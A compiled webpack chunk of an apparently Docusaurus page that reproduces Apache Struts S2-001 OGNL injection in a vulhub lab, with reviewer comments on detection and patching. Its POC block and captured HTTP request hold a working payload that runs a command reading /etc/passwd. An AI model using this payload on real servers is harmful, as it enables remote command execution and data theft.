/**
 * Generated webpack JSONP chunk (chunk id 16, module id 83).
 *
 * The module is the compiled form of the docs page `docs/dyk/struts2/s2-001.md`
 * (see `metadata.source`); the layout looks like Docusaurus/MDX output, but the
 * generator is not named in this file. It exports `frontMatter`, `metadata`,
 * `rightToc` and a default MDX component that renders the page.
 *
 * Security context for reviewers: the page is a write-up reproducing Apache
 * Struts advisory S2-001 (OGNL expression evaluation of a re-displayed form
 * field). The proof-of-concept expression and the captured HTTP request are
 * embedded as plain string children of <code> elements, so in this bundle they
 * are display text only. Defensive takeaways that the embedded sample supports:
 *   - detection: a form field whose decoded value starts with `%{` and names
 *     `java.lang.ProcessBuilder` is the pattern shown in the captured request;
 *   - mitigation: upgrade Struts to a release carrying the S2-001 fix (see the
 *     vendor bulletin of that name) rather than filtering individual payloads;
 *   - hygiene: the captured request publishes a JSESSIONID in both the URL and
 *     the Cookie header. It targets a private lab address, but session ids
 *     should be redacted from published captures.
 */
(window.webpackJsonp = window.webpackJsonp || []).push([
  [16],
  {
    83: function (webpackModule, webpackExports, webpackRequire) {
      "use strict";

      // Mark the exports object as an ES module, then register lazy getters.
      // The getters close over bindings that are assigned further down.
      webpackRequire.r(webpackExports);
      webpackRequire.d(webpackExports, "frontMatter", function () {
        return frontMatter;
      });
      webpackRequire.d(webpackExports, "metadata", function () {
        return metadata;
      });
      webpackRequire.d(webpackExports, "rightToc", function () {
        return rightToc;
      });
      webpackRequire.d(webpackExports, "default", function () {
        return MDXContent;
      });

      // Module ids are opaque here. Judging by how `.a` / `.b` are called below,
      // 3 is an object-merge helper, 8 an omit-keys helper and 94 an element
      // factory. This is inferred from usage and should be confirmed against
      // the bundle manifest.
      var mergeHelper = webpackRequire(3);
      var omitHelper = webpackRequire(8);
      webpackRequire(0); // required only for its side effects; result unused
      var elementFactory = webpackRequire(94);

      // Front matter of the page. Title reads "s2-001 vulnerability reproduction".
      // NOTE(review): the keywords ("JavaScript", "frontend", "video tutorial",
      // "front end") do not match the page topic and look like template leftovers.
      var frontMatter = {
        id: "s2-001",
        title: "s2-001\u6f0f\u6d1e\u590d\u73b0",
        description: null,
        keywords: ["JavaScript", "frontend", "\u89c6\u9891\u6559\u7a0b", "\u524d\u7aef"],
      };

      // Routing / sidebar metadata for the page.
      var metadata = {
        unversionedId: "dyk/struts2/s2-001",
        id: "dyk/struts2/s2-001",
        isDocsHomePage: false,
        title: "s2-001\u6f0f\u6d1e\u590d\u73b0",
        description: "\u6f0f\u6d1e\u8bf4\u660e",
        source: "@site/docs\\dyk\\struts2\\s2-001.md",
        slug: "/dyk/struts2/s2-001",
        permalink: "/docs/dyk/struts2/s2-001",
        editUrl: "https://github.com/lesssafe/lesssafe.github.io/docs/dyk/struts2/s2-001.md",
        version: "current",
        sidebar: "dyk",
        previous: {
          title: "DYK\u8ba1\u5212\u7b80\u4ecb",
          permalink: "/docs/dyk/dyk-intro",
        },
      };

      // Table of contents: "Vulnerability description", "Vulnerability
      // verification", "Python script exploitation tool".
      var rightToc = [
        { value: "\u6f0f\u6d1e\u8bf4\u660e", id: "\u6f0f\u6d1e\u8bf4\u660e", children: [] },
        { value: "\u6f0f\u6d1e\u9a8c\u8bc1", id: "\u6f0f\u6d1e\u9a8c\u8bc1", children: [] },
        {
          value: "python\u811a\u672c\u5229\u7528\u5de5\u5177",
          id: "python\u811a\u672c\u5229\u7528\u5de5\u5177",
          children: [],
        },
      ];

      var layoutProps = { rightToc: rightToc };

      /**
       * Default export: renders the page body inside the "wrapper" layout.
       *
       * @param {object} props - Component props; `components` is forwarded to
       *   the wrapper, every other prop is merged into the wrapper's props.
       * @returns {*} Whatever the element factory (module 94, `.b`) returns.
       */
      function MDXContent(props) {
        var components = props.components;
        var remainingProps = Object(omitHelper.a)(props, ["components"]);

        return Object(elementFactory.b)(
          "wrapper",
          Object(mergeHelper.a)({}, layoutProps, remainingProps, {
            components: components,
            mdxType: "MDXLayout",
          }),

          // Section: vulnerability description.
          Object(elementFactory.b)("h3", { id: "\u6f0f\u6d1e\u8bf4\u660e" }, "\u6f0f\u6d1e\u8bf4\u660e"),
          // Root cause as the page states it: after a failed form validation the
          // backend parses the previously submitted parameter value as an OGNL
          // expression (%{value}) before refilling the form, so user input is
          // evaluated server-side.
          Object(elementFactory.b)(
            "p",
            null,
            "\u8be5\u6f0f\u6d1e\u5176\u5b9e\u662f\u56e0\u4e3a\u7528\u6237\u63d0\u4ea4\u8868\u5355\u6570\u636e\u5e76\u4e14\u9a8c\u8bc1\u5931\u8d25\u65f6\uff0c\u540e\u7aef\u4f1a\u5c06\u7528\u6237\u4e4b\u524d\u63d0\u4ea4\u7684\u53c2\u6570\u503c\u4f7f\u7528OGNL\u8868\u8fbe\u5f0f%{value}\u8fdb\u884c\u89e3\u6790\uff0c\u7136\u540e\u91cd\u65b0\u586b\u5145\u5230\u5bf9\u5e94\u7684\u8868\u5355\u6570\u636e\u4e2d\u3002\u4f8b\u5982\u6ce8\u518c\u6216\u767b\u5f55\u9875\u9762\uff0c\u63d0\u4ea4\u5931\u8d25\u540e\u7aef\u4e00\u822c\u4f1a\u9ed8\u8ba4\u8fd4\u56de\u4e4b\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u7531\u4e8e\u540e\u7aef\u4f7f\u7528%{value}\u5bf9\u63d0\u4ea4\u7684\u6570\u636e\u6267\u884c\u4e86\u4e00\u6b21OGNL\u8868\u8fbe\u5f0f\u89e3\u6790\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u6784\u9020Payload\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002"
          ),

          // Section: verification, run against the vulhub struts2/s2-001 lab image.
          Object(elementFactory.b)("h3", { id: "\u6f0f\u6d1e\u9a8c\u8bc1" }, "\u6f0f\u6d1e\u9a8c\u8bc1"),
          Object(elementFactory.b)("h4", { id: "\u9776\u573a" }, "\u9776\u573a"),
          Object(elementFactory.b)(
            "p",
            null,
            "\u4f7f\u7528vulhub\u8fdb\u884c\u590d\u73b0\nvulhub\u5730\u5740\uff1astruts2/s2-001"
          ),

          // Displayed sample expression. It is a string child of <code>, not
          // markup. Kept byte-for-byte because it is rendered page content.
          Object(elementFactory.b)("h4", { id: "poc" }, "POC"),
          Object(elementFactory.b)(
            "pre",
            null,
            Object(elementFactory.b)(
              "code",
              Object(mergeHelper.a)({ parentName: "pre" }, { className: "language-java" }),
              '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\n'
            )
          ),

          // Captured lab request ("request packet"). The `username` field carries
          // the URL-encoded expression, and `%25%7B` decodes to `%{`. The capture
          // also exposes a JSESSIONID in the path and the Cookie header.
          Object(elementFactory.b)(
            "h4",
            { id: "\u8bf7\u6c42\u6570\u636e\u5305" },
            "\u8bf7\u6c42\u6570\u636e\u5305"
          ),
          Object(elementFactory.b)(
            "pre",
            null,
            Object(elementFactory.b)(
              "code",
              Object(mergeHelper.a)({ parentName: "pre" }, { className: "language-http" }),
              "POST /login.action;jsessionid=09504541EF4ABDD7F72CA76FFF36F735 HTTP/1.1\nHost: 192.168.75.140:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 590\nOrigin: http://192.168.75.140:8080\nConnection: close\nReferer: http://192.168.75.140:8080/\nCookie: JSESSIONID=09504541EF4ABDD7F72CA76FFF36F735\nUpgrade-Insecure-Requests: 1\n\nusername=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D&password=\n"
            )
          ),

          // Three screenshots loaded from a third-party CDN, all with alt: null.
          Object(elementFactory.b)(
            "p",
            null,
            Object(elementFactory.b)(
              "img",
              Object(mergeHelper.a)(
                { parentName: "p" },
                { src: "https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184340.png", alt: null }
              )
            ),
            "\n",
            Object(elementFactory.b)(
              "img",
              Object(mergeHelper.a)(
                { parentName: "p" },
                { src: "https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184406.png", alt: null }
              )
            ),
            "\n",
            Object(elementFactory.b)(
              "img",
              Object(mergeHelper.a)(
                { parentName: "p" },
                { src: "https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184430.png", alt: null }
              )
            )
          ),

          // Section: Python tooling. The body is the placeholder "to be updated".
          Object(elementFactory.b)(
            "h3",
            { id: "python\u811a\u672c\u5229\u7528\u5de5\u5177" },
            "python\u811a\u672c\u5229\u7528\u5de5\u5177"
          ),
          Object(elementFactory.b)("p", null, "\u5f85\u66f4\u65b0")
        );
      }

      MDXContent.isMDXComponent = true;
    },
  },
]);